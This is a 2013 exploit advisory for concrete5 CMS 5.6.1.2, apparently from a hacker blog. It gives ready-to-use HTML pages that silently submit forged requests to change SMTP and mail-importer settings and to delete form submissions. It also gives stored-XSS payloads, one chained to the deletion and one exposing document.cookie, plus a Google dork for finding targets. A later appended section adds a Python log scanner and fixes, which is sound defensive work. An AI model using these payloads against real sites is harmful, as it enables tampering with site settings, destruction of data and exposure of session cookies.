=============================================================
                          eXpl0i13r
                  blackpentesters.blogspot.com
=============================================================

###########################################################################################
# Exploit Title: [concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities]
# Date: [2013-6-9]
# Exploit Author: [expl0i13r]
# Vendor Homepage: [http://www.concrete5.org/]
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/]
# Version: [5.6.1.2]
# Google Dork: [Built with concrete5 - an open source CMS]
# Tested on: [Windows]
# Contact: expl0i13r@gmail.com
###########################################################################################

Summary:
========
1. CSRF (Modify SMTP Settings)
2. CSRF (Modify Mail Importer Settings)
3. CSRF (Delete Form Results)
4. Stored XSS


1. CSRF (Modify SMTP Settings):
================================
concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities, one of which allows an attacker
to modify the "SMTP Settings" and "Send Mail Method" available at the URL below:

Affected URL:
-------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/

----------------------------------------------------------------------------------------
Note: The page below carries pre-filled form values and submits them to the save handler
as soon as the victim loads it.
----------------------------------------------------------------------------------------

<html>
<head></head>
<body>
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form">
  <input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
  <input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">
  <input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">
  <input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">
  <select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" class="ccm-input-select">
    <option value="">None</option>
    <option value="SSL" selected="selected">SSL</option>
    <option value="TLS">TLS</option>
  </select>
  <input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">
</form>
<script type="text/javascript">
  // Auto-submit the pre-filled form when the page loads.
  document.myForm.submit();
</script>
</body>
</html>


2. CSRF (Modify Mail Importer Settings)
=========================================
The page below exploits a CSRF vulnerability that allows an attacker to edit and update the
"Importer Settings".

Affected URL:
-------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/

----------------------------------------------------------------------------------------
Note: The page below carries pre-filled form values and submits them to the save handler
as soon as the victim loads it.
----------------------------------------------------------------------------------------

<html>
<head></head>
<body>
<form name="myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/">
  <input type="hidden" name="miID" id="miID" value="1">
  <input id="miEmail" type="text" name="miEmail" value="exploiter">
  <input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">
  <input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">
  <input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text">
  <input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">
  <select name="miEncryption" id="miEncryption" class="ccm-input-select">
    <option value="" selected="selected">None</option>
  </select>
  <select name="miIsEnabled" id="miIsEnabled" class="ccm-input-select">
    <option value="1" selected="selected">Yes</option>
  </select>
  <select name="miConnectionMethod" id="miConnectionMethod" class="ccm-input-select">
    <option value="POP" selected="selected">POP</option>
  </select>
</form>
<script type="text/javascript">
  // Auto-submit the pre-filled form when the page loads.
  document.myForm.submit();
</script>
</body>
</html>


3. CSRF (Delete Form Results)
===============================
Every submission listed under "REPORTS" > "Form Results" has a static "qsID" assigned to it,
which an attacker can use to delete the submissions.

Example:
--------
When the CMS is installed, a "Contact Us" form is available by default at:
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/

For this contact form the qsID in my case is "1370626098", which can be found in the source of:
--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/
--------------------------------------------------------------------------------------
<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------

To exploit this CSRF the attacker must know the "qsID" values, which requires at least limited
access to the CMS.

Steps:
------
1. Attacker logs in to the CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Reads the static "qsID" value from the page source
4. Uses the "qsID" in the CSRF page below

Code:
-----
<html>
<head>
<script type="text/javascript">
  // "delete" is a reserved word in JavaScript, so the function needs a different name.
  function deleteSubmissions() {
    // Deletes the submissions of the "Contact Us" form
    window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");
  }
</script>
</head>
<body onload="deleteSubmissions()">
</body>
</html>


4. Multiple Stored XSS
=======================
concrete5 CMS also suffers from stored XSS vulnerabilities, one of which can be combined with
the CSRF above to "Delete Form Results" every time the page is loaded.

Stored XSS-1
============
URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/

Vulnerable Parameter:
---------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">

XSS-CSRF Payload:
-----------------
"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>

Stored XSS-2:
=============
URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/

Vulnerable Parameter:
---------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">

Payload:
--------
"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>

##################################
#            eXpl0i13r           #
# ------------------------------ #
# |blackpentesters.blogspot.com | #
# |infotech-knowledge.blogspot.in| #
# ------------------------------ #
##################################
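Detection logic added for this page, not part of the original advisory: it walks web-server access-log lines in the Apache/nginx "combined" format and flags the three state-changing dashboard endpoints named above (save_settings, save_importer, and the GET-based deleteFormAnswers action) whenever the request arrives with a missing or off-site Referer, which is the footprint of the CSRF pages in sections 1 to 3. The log lines, the site host 127.0.0.1 and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# State-changing dashboard paths named in the advisory (relative to index.php).
SENSITIVE_PATHS = (
    "/dashboard/system/mail/method/save_settings/",
    "/dashboard/system/mail/importers/save_importer/",
    "/dashboard/reports/forms/",
)
# Apache/nginx "combined" log line: ... "METHOD PATH PROTO" STATUS SIZE "REFERER" ...
LOG_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)"')

def csrf_indicator(line, site_host="127.0.0.1"):
    """Reason string if the line is a state-changing dashboard request whose Referer is
    absent or off-site, else None. Requests fired by the stored XSS (XSS-1 above) carry
    a same-site Referer, so this check cannot see them."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("path"))
    if not any(p in url.path for p in SENSITIVE_PATHS):
        return None
    # Settings are saved via POST; form results are deleted via a plain GET.
    deletes = "deleteFormAnswers" in parse_qs(url.query).get("action", [])
    if m.group("method") != "POST" and not deletes:
        return None
    referer = m.group("referer")
    if referer in ("", "-"):
        return "state-changing request without Referer"
    ref_host = urlparse(referer).hostname
    if ref_host != site_host:
        return f"state-changing request referred from off-site host {ref_host}"
    return None

def scan(lines, site_host="127.0.0.1"):
    return [(i, r) for i, l in enumerate(lines) if (r := csrf_indicator(l, site_host))]

# Constructed sample log lines (not captured from a real server).
BASE = "/concrete5.6.1.2/concrete5.6.1.2/index.php"
SITE = "http://127.0.0.1" + BASE
SAMPLE_LOG = [  # benign save, cross-site save, referer-less GET delete, benign view
    f'10.0.0.5 - - [09/Jun/2013:10:00:01 +0000] "POST {BASE}/dashboard/system/mail/method/save_settings/ HTTP/1.1" 302 - "{SITE}/dashboard/system/mail/method/" "Mozilla/5.0"',
    f'10.0.0.5 - - [09/Jun/2013:10:02:13 +0000] "POST {BASE}/dashboard/system/mail/importers/save_importer/ HTTP/1.1" 302 - "http://third-party.example/page.html" "Mozilla/5.0"',
    f'10.0.0.5 - - [09/Jun/2013:10:03:44 +0000] "GET {BASE}/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'10.0.0.5 - - [09/Jun/2013:10:04:00 +0000] "GET {BASE}/dashboard/reports/forms/ HTTP/1.1" 200 9001 "{SITE}/dashboard/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A Referer check is only a detection aid: the XSS-1 payload issues the delete from the dashboard itself with a same-site Referer, so the durable fix is a per-request anti-CSRF token on these save and delete handlers plus HTML-encoding of gName and asName on output.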